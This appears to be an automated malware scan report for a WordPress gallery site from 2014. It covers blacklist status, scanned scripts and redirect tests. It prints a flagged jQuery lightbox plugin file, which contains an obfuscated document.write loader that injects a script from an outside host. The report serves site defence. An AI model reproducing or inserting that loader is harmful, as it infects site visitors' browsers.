Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=new.bottega-gallery.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://new.bottega-gallery.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://new.bottega-gallery.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 23 Jun 2014 21:51:12 GMT Location: http://bottega-gallery.com/ Server: Apache/2 Content-Length: 310 Content-Type: text/html; charset=iso-8859-1 | clean |
http://bottega-gallery.com/ | 200 OK Content-Length: 42256 Content-Type: text/html | clean |
http://bottega-gallery.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://bottega-gallery.com/wp-includes/js/jquery/jquery.js?ver=1.6.1 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://bottega-gallery.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js?ver=1.4.9 | 200 OK Content-Length: 23634 Content-Type: application/javascript | clean |
http://bottega-gallery.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js?ver=1.0 | 200 OK Content-Length: 447 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(function(a){"undefined"!==typeof K2&&new function(){this.updateImageList=function(){a.Lightbox.relify()}};a(".gallery a:has(img)").lightbox();a("a:not([title]):has(img)").attr("title",function(){return a(this).children("img:first").attr("title")})}); <!-- js-tools --> y=0;while(y<79)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00bvejups/{uvb/ofu0dpnqpofout0dpn`dpoubdu0tubu/qiq#?=0tdsjqu?'.charCodeAt(y++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://bottega-gallery.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.88 | 200 OK Content-Length: 31032 Content-Type: application/javascript | clean |
http://bottega-gallery.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05 | 200 OK Content-Length: 1750 Content-Type: application/javascript | clean |
http://bottega-gallery.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js | 200 OK Content-Length: 1030 Content-Type: application/javascript | clean |
http://bottega-gallery.com/wp-content/themes/bottega-new/js/jquery-modals.js?ver=1.3.2 | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://bottega-gallery.com/wp-content/themes/bottega-new/js/js/jquery.1.1.4.pack.js?ver=1.1.4 | 200 OK Content-Length: 22701 Content-Type: application/javascript | clean |
http://bottega-gallery.com/wp-content/themes/bottega-new/js/js/jquery-easing.1.1.1.pack.js | 200 OK Content-Length: 2541 Content-Type: application/javascript | clean |
http://bottega-gallery.com/wp-content/themes/bottega-new/js/js/coda-slider.1.0.pack.js | 200 OK Content-Length: 2144 Content-Type: application/javascript | clean |
http://userapi.com/js/api/openapi.js?52 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://userapi.com/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: new.bottega-gallery.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 23 Jun 2014 21:51:12 GMT
Location: http://bottega-gallery.com/
Server: Apache/2
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
...310 bytes of data.
GET / HTTP/1.1
Host: new.bottega-gallery.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 23 Jun 2014 21:51:12 GMT
Location: http://bottega-gallery.com/
Server: Apache/2
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
...310 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: new.bottega-gallery.com
Referer: http://www.google.com/search?q=new.bottega-gallery.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: new.bottega-gallery.com
Referer: http://www.google.com/search?q=new.bottega-gallery.com
Result:
The result is similar to the first query. There are no suspicious redirects found.